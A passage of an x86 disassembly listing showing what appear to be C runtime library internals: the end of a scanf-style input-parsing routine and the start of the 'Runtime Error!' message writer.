loc_4098D6:				; CODE XREF: sub_409427+40Cj
					; sub_409427+41Aj ...
		cmp	[ebp+18Ch+var_1A8], 0
		jz	loc_4099D6
		cmp	[ebp+18Ch+var_190], 65h
		jz	short loc_4098F0
		cmp	[ebp+18Ch+var_190], 45h
		jnz	loc_4099D6

loc_4098F0:				; CODE XREF: sub_409427+4BDj
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jz	loc_4099D6
		mov	eax, [ebp+18Ch+var_1B0]
		mov	byte ptr [ebx+eax], 65h
		lea	eax, [ebp+18Ch+var_1D0]
		push	eax
		lea	eax, [ebp+18Ch+var_184]
		push	eax
		inc	ebx
		push	ebx
		lea	edi, [ebp+18Ch+var_1B0]
		lea	esi, [ebp+18Ch+var_1D8]
		call	sub_409398
		add	esp, 0Ch
		test	eax, eax
		jz	loc_40A019
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		cmp	eax, 2Dh
		mov	[ebp+18Ch+var_190], eax
		jnz	short loc_40995B
		mov	eax, [ebp+18Ch+var_1B0]
		mov	byte ptr [ebx+eax], 2Dh
		lea	eax, [ebp+18Ch+var_1D0]
		push	eax
		lea	eax, [ebp+18Ch+var_184]
		push	eax
		inc	ebx
		push	ebx
		call	sub_409398
		add	esp, 0Ch
		test	eax, eax
		jz	loc_40A019
		jmp	short loc_409961
; ---------------------------------------------------------------------------

loc_40995B:				; CODE XREF: sub_409427+50Fj
		cmp	[ebp+18Ch+var_190], 2Bh
		jnz	short loc_40997E

loc_409961:				; CODE XREF: sub_409427+532j
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jnz	short loc_409970
		and	[ebp+18Ch+var_198], eax
		jmp	short loc_40997E
; ---------------------------------------------------------------------------

loc_409970:				; CODE XREF: sub_409427+542j
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	[ebp+18Ch+var_190], eax

loc_40997E:				; CODE XREF: sub_409427+538j
					; sub_409427+547j
		movzx	eax, byte ptr [ebp+18Ch+var_190]
		jmp	short loc_4099CB
; ---------------------------------------------------------------------------

loc_409984:				; CODE XREF: sub_409427+5ADj
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jz	short loc_4099D6
		mov	eax, [ebp+18Ch+var_1B0]
		mov	cl, byte ptr [ebp+18Ch+var_190]
		inc	[ebp+18Ch+var_1A8]
		mov	[ebx+eax], cl
		lea	eax, [ebp+18Ch+var_1D0]
		push	eax
		lea	eax, [ebp+18Ch+var_184]
		push	eax
		inc	ebx
		push	ebx
		lea	edi, [ebp+18Ch+var_1B0]
		lea	esi, [ebp+18Ch+var_1D8]
		call	sub_409398
		add	esp, 0Ch
		test	eax, eax
		jz	loc_40A019
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	[ebp+18Ch+var_190], eax
		movzx	eax, al

loc_4099CB:				; CODE XREF: sub_409427+55Bj
		push	eax
		call	sub_40F73F
		test	eax, eax
		pop	ecx
		jnz	short loc_409984

loc_4099D6:				; CODE XREF: sub_409427+4B3j
					; sub_409427+4C3j ...
		dec	[ebp+18Ch+var_188]
		cmp	[ebp+18Ch+var_190], 0FFFFFFFFh
		jz	short loc_4099EC
		push	[ebp+18Ch+var_1A0]
		push	[ebp+18Ch+var_190]
		call	sub_40F85F
		pop	ecx
		pop	ecx

loc_4099EC:				; CODE XREF: sub_409427+5B6j
		cmp	[ebp+18Ch+var_1A8], 0
		jz	loc_40A019
		cmp	[ebp+18Ch+var_199], 0
		jnz	loc_409F81
		mov	eax, [ebp+18Ch+var_1B0]
		inc	[ebp+18Ch+var_1C8]
		lea	ecx, [ebp+18Ch+var_1F8]
		push	ecx
		push	eax
		push	[ebp+18Ch+var_1C4]
		mov	byte ptr [ebx+eax], 0
		movsx	eax, [ebp+18Ch+var_19A]
		dec	eax
		push	eax
		push	off_424F9C
		call	sub_405753
		pop	ecx
		call	eax
		add	esp, 10h
		jmp	loc_409F81
; ---------------------------------------------------------------------------

loc_409A2E:				; CODE XREF: sub_409427+31Bj
		test	ecx, ecx
		jnz	short loc_409A3C
		inc	[ebp+18Ch+var_198]
		mov	[ebp+18Ch+var_1B8], 1

loc_409A3C:				; CODE XREF: sub_409427+609j
					; sub_409427+723j
		cmp	[ebp+18Ch+var_191], 0
		jle	short loc_409A46
		mov	[ebp+18Ch+var_1A2], 1

loc_409A46:				; CODE XREF: sub_409427+619j
					; sub_409427+823j
		dec	[ebp+18Ch+var_188]
		cmp	[ebp+18Ch+var_190], 0FFFFFFFFh
		mov	edi, esi
		jz	short loc_409A5E
		push	[ebp+18Ch+var_1A0]
		push	[ebp+18Ch+var_190]
		call	sub_40F85F
		pop	ecx
		pop	ecx

loc_409A5E:				; CODE XREF: sub_409427+628j
					; sub_409427+8E6j ...
		cmp	[ebp+18Ch+var_1B8], 0
		jz	short loc_409A72
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jz	loc_409D2B

loc_409A72:				; CODE XREF: sub_409427+63Bj
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		cmp	eax, 0FFFFFFFFh
		mov	[ebp+18Ch+var_190], eax
		jz	loc_409D18
		cmp	ebx, 63h
		jz	short loc_409AD7
		cmp	ebx, 73h
		jnz	short loc_409AA6
		cmp	eax, 9
		jl	short loc_409AA1
		cmp	eax, 0Dh
		jle	loc_409D18

loc_409AA1:				; CODE XREF: sub_409427+66Fj
		cmp	eax, 20h
		jnz	short loc_409AD7

loc_409AA6:				; CODE XREF: sub_409427+66Aj
		cmp	ebx, 7Bh
		jnz	loc_409D18
		movsx	ebx, [ebp+18Ch+var_1A4]
		xor	edx, edx
		mov	ecx, eax
		and	ecx, 7
		inc	edx
		shl	edx, cl
		mov	ecx, eax
		sar	ecx, 3
		movsx	ecx, [ebp+ecx+18Ch+var_24]
		xor	ecx, ebx
		test	edx, ecx
		mov	ebx, [ebp+18Ch+var_1AC]
		jz	loc_409D18

loc_409AD7:				; CODE XREF: sub_409427+665j
					; sub_409427+67Dj
		cmp	[ebp+18Ch+var_199], 0
		jnz	loc_409D12
		cmp	[ebp+18Ch+var_1A2], 0
		jz	loc_409D07
		mov	[ebp+18Ch+var_1DC], al
		movzx	eax, al
		push	eax
		call	sub_40CFF6
		test	eax, eax
		pop	ecx
		jz	short loc_409B0A
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	[ebp+18Ch+var_1DB], al

loc_409B0A:				; CODE XREF: sub_409427+6D3j
		lea	eax, [ebp+18Ch+var_1F8]
		push	eax
		mov	eax, [ebp+18Ch+var_1F8]
		mov	[ebp+18Ch+var_1E8], 3Fh
		push	dword ptr [eax+0ACh]
		lea	eax, [ebp+18Ch+var_1DC]
		push	eax
		lea	eax, [ebp+18Ch+var_1E8]
		push	eax
		call	sub_40F97D
		mov	ax, word ptr [ebp+18Ch+var_1E8]
		add	esp, 10h
		mov	[esi], ax
		inc	esi
		inc	esi
		jmp	loc_409D0A
; ---------------------------------------------------------------------------

loc_409B3C:				; CODE XREF: sub_409427+30Cj
		mov	eax, ebx
		sub	eax, 70h
		jz	loc_409D63
		sub	eax, 3
		jz	loc_409A3C
		dec	eax
		dec	eax
		jz	loc_409D67
		sub	eax, 3
		jz	loc_409781
		sub	eax, 3
		jz	short loc_409B8A

loc_409B66:				; CODE XREF: sub_409427+32Cj
					; sub_409427+33Fj
		movzx	eax, byte ptr [edi]
		cmp	eax, [ebp+18Ch+var_190]
		jnz	loc_409FF1
		dec	[ebp+18Ch+var_1A1]
		cmp	[ebp+18Ch+var_199], 0
		jnz	loc_409F81
		mov	eax, [ebp+18Ch+var_1FC]
		mov	[ebp+18Ch+var_1E4], eax
		jmp	loc_409F81
; ---------------------------------------------------------------------------

loc_409B8A:				; CODE XREF: sub_409427+73Dj
		cmp	[ebp+18Ch+var_191], 0
		jle	short loc_409B94
		mov	[ebp+18Ch+var_1A2], 1

loc_409B94:				; CODE XREF: sub_409427+767j
		inc	edi
		cmp	byte ptr [edi],	5Eh
		mov	esi, edi
		jnz	short loc_409BA3
		lea	esi, [edi+1]
		mov	[ebp+18Ch+var_1A4], 0FFh

loc_409BA3:				; CODE XREF: sub_409427+773j
		push	20h
		lea	eax, [ebp+18Ch+var_24]
		push	0
		push	eax
		call	sub_408130
		add	esp, 0Ch
		cmp	byte ptr [esi],	5Dh
		jnz	short loc_409BC7
		mov	dl, 5Dh
		inc	esi
		mov	[ebp+18Ch+var_19], 20h
		jmp	short loc_409C36
; ---------------------------------------------------------------------------

loc_409BC7:				; CODE XREF: sub_409427+792j
		mov	dl, [ebp+18Ch+var_1C9]
		jmp	short loc_409C36
; ---------------------------------------------------------------------------

loc_409BCC:				; CODE XREF: sub_409427+813j
		inc	esi
		cmp	al, 2Dh
		jnz	short loc_409C19
		test	dl, dl
		jz	short loc_409C19
		mov	cl, [esi]
		cmp	cl, 5Dh
		jz	short loc_409C19
		inc	esi
		cmp	dl, cl
		jnb	short loc_409BE5
		mov	al, cl
		jmp	short loc_409BE9
; ---------------------------------------------------------------------------

loc_409BE5:				; CODE XREF: sub_409427+7B8j
		mov	al, dl
		mov	dl, cl

loc_409BE9:				; CODE XREF: sub_409427+7BCj
		cmp	dl, al
		ja	short loc_409C15
		sub	al, dl
		inc	al
		movzx	edi, dl
		movzx	edx, al

loc_409BF7:				; CODE XREF: sub_409427+7E9j
		mov	ecx, edi
		and	ecx, 7
		mov	eax, edi
		mov	bl, 1
		shl	bl, cl
		shr	eax, 3
		lea	eax, [ebp+eax+18Ch+var_24]
		or	[eax], bl
		inc	edi
		dec	edx
		jnz	short loc_409BF7
		mov	ebx, [ebp+18Ch+var_1AC]

loc_409C15:				; CODE XREF: sub_409427+7C4j
		xor	dl, dl
		jmp	short loc_409C36
; ---------------------------------------------------------------------------

loc_409C19:				; CODE XREF: sub_409427+7A8j
					; sub_409427+7ACj ...
		movzx	ecx, al
		mov	dl, al
		mov	eax, ecx
		and	ecx, 7
		mov	bl, 1
		shl	bl, cl
		shr	eax, 3
		lea	eax, [ebp+eax+18Ch+var_24]
		or	[eax], bl
		mov	ebx, [ebp+18Ch+var_1AC]

loc_409C36:				; CODE XREF: sub_409427+79Ej
					; sub_409427+7A3j ...
		mov	al, [esi]
		cmp	al, 5Dh
		jnz	short loc_409BCC
		test	al, al
		jz	loc_40A019
		mov	[ebp+18Ch+var_1B4], esi
		mov	esi, [ebp+18Ch+var_1C4]
		jmp	loc_409A46
; ---------------------------------------------------------------------------

loc_409C4F:				; CODE XREF: sub_409427+360j
		cmp	ebx, 2Bh
		jnz	short loc_409C73

loc_409C54:				; CODE XREF: sub_409427+36Aj
		dec	[ebp+18Ch+var_198]
		jnz	short loc_409C63
		test	ecx, ecx
		jz	short loc_409C63
		mov	[ebp+18Ch+var_189], 1
		jmp	short loc_409C73
; ---------------------------------------------------------------------------

loc_409C63:				; CODE XREF: sub_409427+830j
					; sub_409427+834j
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	ebx, eax
		mov	[ebp+18Ch+var_190], ebx

loc_409C73:				; CODE XREF: sub_409427+82Bj
					; sub_409427+83Aj
		cmp	ebx, 30h
		jnz	loc_409D99
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	ebx, eax
		cmp	bl, 78h
		mov	[ebp+18Ch+var_190], ebx
		jz	short loc_409CD8
		cmp	bl, 58h
		jz	short loc_409CD8
		cmp	[ebp+18Ch+var_1AC], 78h
		mov	[ebp+18Ch+var_1A8], 1
		jz	short loc_409CBD
		cmp	[ebp+18Ch+var_1B8], 0
		jz	short loc_409CB1
		dec	[ebp+18Ch+var_198]
		jnz	short loc_409CB1
		inc	[ebp+18Ch+var_189]

loc_409CB1:				; CODE XREF: sub_409427+880j
					; sub_409427+885j
		mov	[ebp+18Ch+var_1AC], 6Fh
		jmp	loc_409D99
; ---------------------------------------------------------------------------

loc_409CBD:				; CODE XREF: sub_409427+87Aj
		dec	[ebp+18Ch+var_188]
		cmp	ebx, 0FFFFFFFFh
		jz	short loc_409CD0
		push	[ebp+18Ch+var_1A0]
		push	ebx
		call	sub_40F85F
		pop	ecx
		pop	ecx

loc_409CD0:				; CODE XREF: sub_409427+89Cj
		push	30h
		pop	ebx
		jmp	loc_409D96
; ---------------------------------------------------------------------------

loc_409CD8:				; CODE XREF: sub_409427+868j
					; sub_409427+86Dj
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		cmp	[ebp+18Ch+var_1B8], 0
		mov	ebx, eax
		mov	[ebp+18Ch+var_190], ebx
		jz	short loc_409CFB
		sub	[ebp+18Ch+var_198], 2
		cmp	[ebp+18Ch+var_198], 1
		jge	short loc_409CFB
		inc	[ebp+18Ch+var_189]

loc_409CFB:				; CODE XREF: sub_409427+8C5j
					; sub_409427+8CFj
		mov	[ebp+18Ch+var_1AC], 78h
		jmp	loc_409D99
; ---------------------------------------------------------------------------

loc_409D07:				; CODE XREF: sub_409427+6BEj
		mov	[esi], al
		inc	esi

loc_409D0A:				; CODE XREF: sub_409427+710j
		mov	[ebp+18Ch+var_1C4], esi
		jmp	loc_409A5E
; ---------------------------------------------------------------------------

loc_409D12:				; CODE XREF: sub_409427+6B4j
		inc	edi
		jmp	loc_409A5E
; ---------------------------------------------------------------------------

loc_409D18:				; CODE XREF: sub_409427+65Cj
					; sub_409427+674j ...
		dec	[ebp+18Ch+var_188]
		cmp	eax, 0FFFFFFFFh
		jz	short loc_409D2B
		push	[ebp+18Ch+var_1A0]
		push	eax
		call	sub_40F85F
		pop	ecx
		pop	ecx

loc_409D2B:				; CODE XREF: sub_409427+645j
					; sub_409427+8F7j
		cmp	edi, esi
		jz	loc_40A019
		cmp	[ebp+18Ch+var_199], 0
		jnz	loc_409F81
		inc	[ebp+18Ch+var_1C8]
		cmp	ebx, 63h
		jz	loc_409F81
		cmp	[ebp+18Ch+var_1A2], 0
		mov	eax, [ebp+18Ch+var_1C4]
		jz	short loc_409D5B
		and	word ptr [eax],	0
		jmp	loc_409F81
; ---------------------------------------------------------------------------

loc_409D5B:				; CODE XREF: sub_409427+929j
		mov	byte ptr [eax],	0
		jmp	loc_409F81
; ---------------------------------------------------------------------------

loc_409D63:				; CODE XREF: sub_409427+71Aj
		mov	[ebp+18Ch+var_19A], 1

loc_409D67:				; CODE XREF: sub_409427+312j
					; sub_409427+326j ...
		mov	ebx, [ebp+18Ch+var_190]
		cmp	ebx, 2Dh
		jnz	short loc_409D75
		mov	[ebp+18Ch+var_1A3], 1
		jmp	short loc_409D7A
; ---------------------------------------------------------------------------

loc_409D75:				; CODE XREF: sub_409427+946j
		cmp	ebx, 2Bh
		jnz	short loc_409D99

loc_409D7A:				; CODE XREF: sub_409427+94Cj
		dec	[ebp+18Ch+var_198]
		jnz	short loc_409D89
		test	ecx, ecx
		jz	short loc_409D89
		mov	[ebp+18Ch+var_189], 1
		jmp	short loc_409D99
; ---------------------------------------------------------------------------

loc_409D89:				; CODE XREF: sub_409427+956j
					; sub_409427+95Aj
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	ebx, eax

loc_409D96:				; CODE XREF: sub_409427+8ACj
		mov	[ebp+18Ch+var_190], ebx

loc_409D99:				; CODE XREF: sub_409427+84Fj
					; sub_409427+891j ...
		cmp	[ebp+18Ch+var_1D4], 0
		jz	loc_409E9E
		cmp	[ebp+18Ch+var_189], 0
		jnz	loc_409E79

loc_409DAD:				; CODE XREF: sub_409427+A3Aj
		cmp	[ebp+18Ch+var_1AC], 78h
		jz	short loc_409E02
		cmp	[ebp+18Ch+var_1AC], 70h
		jz	short loc_409E02
		movzx	eax, bl
		push	eax
		call	sub_40F73F
		test	eax, eax
		pop	ecx
		jz	loc_409E66
		cmp	[ebp+18Ch+var_1AC], 6Fh
		jnz	short loc_409DEC
		cmp	ebx, 38h
		jge	loc_409E66
		mov	eax, [ebp+18Ch+var_1BC]
		mov	esi, [ebp+18Ch+var_1C0]
		shld	eax, esi, 3
		shl	esi, 3
		mov	[ebp+18Ch+var_1BC], eax
		jmp	short loc_409E37
; ---------------------------------------------------------------------------

loc_409DEC:				; CODE XREF: sub_409427+9A8j
		push	0
		push	0Ah
		push	[ebp+18Ch+var_1BC]
		push	[ebp+18Ch+var_1C0]
		call	sub_40FAB0
		mov	esi, eax
		mov	[ebp+18Ch+var_1BC], edx
		jmp	short loc_409E37
; ---------------------------------------------------------------------------

loc_409E02:				; CODE XREF: sub_409427+98Aj
					; sub_409427+990j
		movzx	edi, bl
		push	edi
		call	sub_40F7BC
		test	eax, eax
		pop	ecx
		jz	short loc_409E66
		mov	eax, [ebp+18Ch+var_1BC]
		mov	esi, [ebp+18Ch+var_1C0]
		shld	eax, esi, 4
		push	edi
		shl	esi, 4
		mov	[ebp+18Ch+var_1BC], eax
		call	sub_40F73F
		test	eax, eax
		pop	ecx
		movsx	ebx, bl
		jnz	short loc_409E34
		and	ebx, 0FFFFFFDFh
		sub	ebx, 7

loc_409E34:				; CODE XREF: sub_409427+A05j
		mov	[ebp+18Ch+var_190], ebx

loc_409E37:				; CODE XREF: sub_409427+9C3j
					; sub_409427+9D9j
		inc	[ebp+18Ch+var_1A8]
		lea	eax, [ebx-30h]
		cdq
		add	esi, eax
		adc	[ebp+18Ch+var_1BC], edx
		cmp	[ebp+18Ch+var_1B8], 0
		mov	[ebp+18Ch+var_1C0], esi
		jz	short loc_409E51
		dec	[ebp+18Ch+var_198]
		jz	short loc_409E79

loc_409E51:				; CODE XREF: sub_409427+A23j
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	ebx, eax
		mov	[ebp+18Ch+var_190], ebx
		jmp	loc_409DAD
; ---------------------------------------------------------------------------

loc_409E66:				; CODE XREF: sub_409427+99Ej
					; sub_409427+9ADj ...
		dec	[ebp+18Ch+var_188]
		cmp	ebx, 0FFFFFFFFh
		jz	short loc_409E79
		push	[ebp+18Ch+var_1A0]
		push	ebx
		call	sub_40F85F
		pop	ecx
		pop	ecx

loc_409E79:				; CODE XREF: sub_409427+980j
					; sub_409427+A28j ...
		cmp	[ebp+18Ch+var_1A3], 0
		mov	edi, [ebp+18Ch+var_1E0]
		jz	loc_409F41
		mov	eax, [ebp+18Ch+var_1C0]
		mov	ecx, [ebp+18Ch+var_1BC]
		neg	eax
		adc	ecx, 0
		neg	ecx
		mov	[ebp+18Ch+var_1C0], eax
		mov	[ebp+18Ch+var_1BC], ecx
		jmp	loc_409F41
; ---------------------------------------------------------------------------

loc_409E9E:				; CODE XREF: sub_409427+976j
		cmp	[ebp+18Ch+var_189], 0
		mov	edi, [ebp+18Ch+var_1E0]
		jnz	loc_409F39

loc_409EAB:				; CODE XREF: sub_409427+AFDj
		cmp	[ebp+18Ch+var_1AC], 78h
		jz	short loc_409EDA
		cmp	[ebp+18Ch+var_1AC], 70h
		jz	short loc_409EDA
		movzx	eax, bl
		push	eax
		call	sub_40F73F
		test	eax, eax
		pop	ecx
		jz	short loc_409F26
		cmp	[ebp+18Ch+var_1AC], 6Fh
		jnz	short loc_409ED5
		cmp	ebx, 38h
		jge	short loc_409F26
		shl	edi, 3
		jmp	short loc_409F02
; ---------------------------------------------------------------------------

loc_409ED5:				; CODE XREF: sub_409427+AA2j
		imul	edi, 0Ah
		jmp	short loc_409F02
; ---------------------------------------------------------------------------

loc_409EDA:				; CODE XREF: sub_409427+A88j
					; sub_409427+A8Ej
		movzx	esi, bl
		push	esi
		call	sub_40F7BC
		test	eax, eax
		pop	ecx
		jz	short loc_409F26
		push	esi
		shl	edi, 4
		call	sub_40F73F
		test	eax, eax
		pop	ecx
		movsx	ebx, bl
		jnz	short loc_409EFF
		and	ebx, 0FFFFFFDFh
		sub	ebx, 7

loc_409EFF:				; CODE XREF: sub_409427+AD0j
		mov	[ebp+18Ch+var_190], ebx

loc_409F02:				; CODE XREF: sub_409427+AACj
					; sub_409427+AB1j
		inc	[ebp+18Ch+var_1A8]
		cmp	[ebp+18Ch+var_1B8], 0
		lea	edi, [edi+ebx-30h]
		jz	short loc_409F14
		dec	[ebp+18Ch+var_198]
		jz	short loc_409F39

loc_409F14:				; CODE XREF: sub_409427+AE6j
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	ebx, eax
		mov	[ebp+18Ch+var_190], ebx
		jmp	short loc_409EAB
; ---------------------------------------------------------------------------

loc_409F26:				; CODE XREF: sub_409427+A9Cj
					; sub_409427+AA7j ...
		dec	[ebp+18Ch+var_188]
		cmp	ebx, 0FFFFFFFFh
		jz	short loc_409F39
		push	[ebp+18Ch+var_1A0]
		push	ebx
		call	sub_40F85F
		pop	ecx
		pop	ecx

loc_409F39:				; CODE XREF: sub_409427+A7Ej
					; sub_409427+AEBj ...
		cmp	[ebp+18Ch+var_1A3], 0
		jz	short loc_409F41
		neg	edi

loc_409F41:				; CODE XREF: sub_409427+A59j
					; sub_409427+A72j ...
		cmp	[ebp+18Ch+var_1AC], 46h
		jnz	short loc_409F4B
		and	[ebp+18Ch+var_1A8], 0

loc_409F4B:				; CODE XREF: sub_409427+B1Ej
		cmp	[ebp+18Ch+var_1A8], 0
		jz	loc_40A019
		cmp	[ebp+18Ch+var_199], 0
		jnz	short loc_409F81
		inc	[ebp+18Ch+var_1C8]
		mov	esi, [ebp+18Ch+var_1C4]

loc_409F61:				; CODE XREF: sub_409427+34Cj
		cmp	[ebp+18Ch+var_1D4], 0
		jz	short loc_409F74
		mov	eax, [ebp+18Ch+var_1C0]
		mov	[esi], eax
		mov	eax, [ebp+18Ch+var_1BC]
		mov	[esi+4], eax
		jmp	short loc_409F81
; ---------------------------------------------------------------------------

loc_409F74:				; CODE XREF: sub_409427+B3Ej
		cmp	[ebp+18Ch+var_19A], 0
		jz	short loc_409F7E
		mov	[esi], edi
		jmp	short loc_409F81
; ---------------------------------------------------------------------------

loc_409F7E:				; CODE XREF: sub_409427+B51j
		mov	[esi], di

loc_409F81:				; CODE XREF: sub_409427+352j
					; sub_409427+5D3j ...
		mov	edi, [ebp+18Ch+var_1B4]
		inc	[ebp+18Ch+var_1A1]
		inc	edi
		mov	[ebp+18Ch+var_1B4], edi
		jmp	short loc_409FCF
; ---------------------------------------------------------------------------

loc_409F8D:				; CODE XREF: sub_409427+17Cj
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	ebx, eax
		movzx	eax, byte ptr [edi]
		inc	edi
		cmp	eax, ebx
		mov	[ebp+18Ch+var_190], ebx
		mov	[ebp+18Ch+var_1B4], edi
		jnz	short loc_40A007
		movzx	eax, bl
		push	eax
		call	sub_40CFF6
		test	eax, eax
		pop	ecx
		jz	short loc_409FCF
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		movzx	ecx, byte ptr [edi]
		inc	edi
		cmp	ecx, eax
		mov	[ebp+18Ch+var_1B4], edi
		jnz	short loc_409FF7
		dec	[ebp+18Ch+var_188]

loc_409FCF:				; CODE XREF: sub_409427+B64j
					; sub_409427+B8Dj
		cmp	[ebp+18Ch+var_190], 0FFFFFFFFh
		jnz	short loc_409FE5
		cmp	byte ptr [edi],	25h
		jnz	short loc_40A019
		mov	eax, [ebp+18Ch+var_1B4]
		cmp	byte ptr [eax+1], 6Eh
		jnz	short loc_40A019
		mov	edi, eax

loc_409FE5:				; CODE XREF: sub_409427+174j
					; sub_409427+BACj
		mov	al, [edi]
		test	al, al
		jnz	loc_40955F
		jmp	short loc_40A019
; ---------------------------------------------------------------------------

loc_409FF1:				; CODE XREF: sub_409427+303j
					; sub_409427+745j
		cmp	[ebp+18Ch+var_190], 0FFFFFFFFh
		jmp	short loc_40A00A
; ---------------------------------------------------------------------------

loc_409FF7:				; CODE XREF: sub_409427+BA3j
		cmp	eax, 0FFFFFFFFh
		jz	short loc_40A007
		push	[ebp+18Ch+var_1A0]
		push	eax
		call	sub_40F85F
		pop	ecx
		pop	ecx

loc_40A007:				; CODE XREF: sub_409427+B7Fj
					; sub_409427+BD3j
		cmp	ebx, 0FFFFFFFFh

loc_40A00A:				; CODE XREF: sub_409427+BCEj
		jz	short loc_40A019
		push	[ebp+18Ch+var_1A0]
		push	[ebp+18Ch+var_190]
		call	sub_40F85F
		pop	ecx
		pop	ecx

loc_40A019:				; CODE XREF: sub_409427+2ECj
					; sub_409427+3D7j ...
		cmp	[ebp+18Ch+var_1D0], 1
		jnz	short loc_40A028
		push	[ebp+18Ch+var_1B0]
		call	sub_403B91
		pop	ecx

loc_40A028:				; CODE XREF: sub_409427+BF6j
		cmp	[ebp+18Ch+var_190], 0FFFFFFFFh
		jnz	short loc_40A04C
		mov	eax, [ebp+18Ch+var_1C8]
		test	eax, eax
		jnz	short loc_40A03D
		cmp	[ebp+18Ch+var_1A1], al
		jnz	short loc_40A03D
		or	eax, 0FFFFFFFFh

loc_40A03D:				; CODE XREF: sub_409427+C0Cj
					; sub_409427+C11j
		cmp	[ebp+18Ch+var_1EC], 0
		jz	short loc_40A05C
		mov	ecx, [ebp+18Ch+var_1F0]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	short loc_40A05C
; ---------------------------------------------------------------------------

loc_40A04C:				; CODE XREF: sub_409427+12Fj
					; sub_409427+C05j
		cmp	[ebp+18Ch+var_1EC], 0
		jz	short loc_40A059
		mov	eax, [ebp+18Ch+var_1F0]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40A059:				; CODE XREF: sub_409427+C29j
		mov	eax, [ebp+18Ch+var_1C8]

loc_40A05C:				; CODE XREF: sub_409427+70j
					; sub_409427+C1Aj ...
		mov	ecx, [ebp+18Ch+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		add	ebp, 18Ch
		leave
		retn
sub_409427	endp


; =============== S U B	R O U T	I N E =======================================



sub_40A074	proc near		; CODE XREF: sub_403C6E+2Ap
					; sub_40449D+12p ...

var_4		= byte ptr -4
arg_0		= dword	ptr  4

		push	ecx
		push	ebx
		mov	ebx, [esp+8+arg_0]
		push	esi
		push	edi
		xor	esi, esi
		xor	edi, edi

loc_40A080:				; CODE XREF: sub_40A074+19j
		cmp	ebx, dword_424C00[edi*8]
		jz	short loc_40A08F
		inc	edi
		cmp	edi, 17h
		jl	short loc_40A080

loc_40A08F:				; CODE XREF: sub_40A074+13j
		cmp	edi, 17h
		jnb	loc_40A20F
		push	ebp
		push	3
		call	sub_40FC82
		cmp	eax, 1
		pop	ecx
		jz	loc_40A1DB
		push	3
		call	sub_40FC82
		test	eax, eax
		pop	ecx
		jnz	short loc_40A0C3
		cmp	dword_424050, 1
		jz	loc_40A1DB

loc_40A0C3:				; CODE XREF: sub_40A074+40j
		cmp	ebx, 0FCh
		jz	loc_40A20E
		push	offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
		mov	ebx, 314h
		push	ebx
		mov	ebp, offset dword_428AF8
		push	ebp
		call	sub_407C95
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_40A0F9
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4033CB
		add	esp, 14h

loc_40A0F9:				; CODE XREF: sub_40A074+76j
		push	104h
		mov	esi, offset byte_428B11
		push	esi
		push	0
		mov	byte_428C15, 0
		call	ds:dword_41E060	; GetModuleFileNameA
		test	eax, eax
		jnz	short loc_40A13D
		push	offset aProgramNameUnk ; "<program name	unknown>"
		push	2FBh
		push	esi
		call	sub_407C95
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_40A13D
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		call	sub_4033CB
		add	esp, 14h

loc_40A13D:				; CODE XREF: sub_40A074+A1j
					; sub_40A074+B8j
		push	esi
		call	sub_4046F0
		inc	eax
		cmp	eax, 3Ch
		pop	ecx
		jbe	short loc_40A182
		push	esi
		call	sub_4046F0
		sub	esi, 3Bh
		add	eax, esi
		push	3
		mov	ecx, offset dword_428E0C
		push	offset a___	; "..."
		sub	ecx, eax
		push	ecx
		push	eax
		call	sub_40CE06
		add	esp, 14h
		test	eax, eax
		jz	short loc_40A182
		xor	esi, esi
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4033CB
		add	esp, 14h
		jmp	short loc_40A184
; ---------------------------------------------------------------------------

loc_40A182:				; CODE XREF: sub_40A074+D4j
					; sub_40A074+FBj
		xor	esi, esi

loc_40A184:				; CODE XREF: sub_40A074+10Cj
		push	offset asc_41EB30 ; "\n\n"
		push	ebx
		push	ebp
		call	sub_40CD4D
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_40A1A4
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4033CB
		add	esp, 14h

loc_40A1A4:				; CODE XREF: sub_40A074+121j
		push	off_424C04[edi*8]
		push	ebx
		push	ebp
		call	sub_40CD4D
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_40A1C6
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4033CB
		add	esp, 14h

loc_40A1C6:				; CODE XREF: sub_40A074+143j
		push	12010h
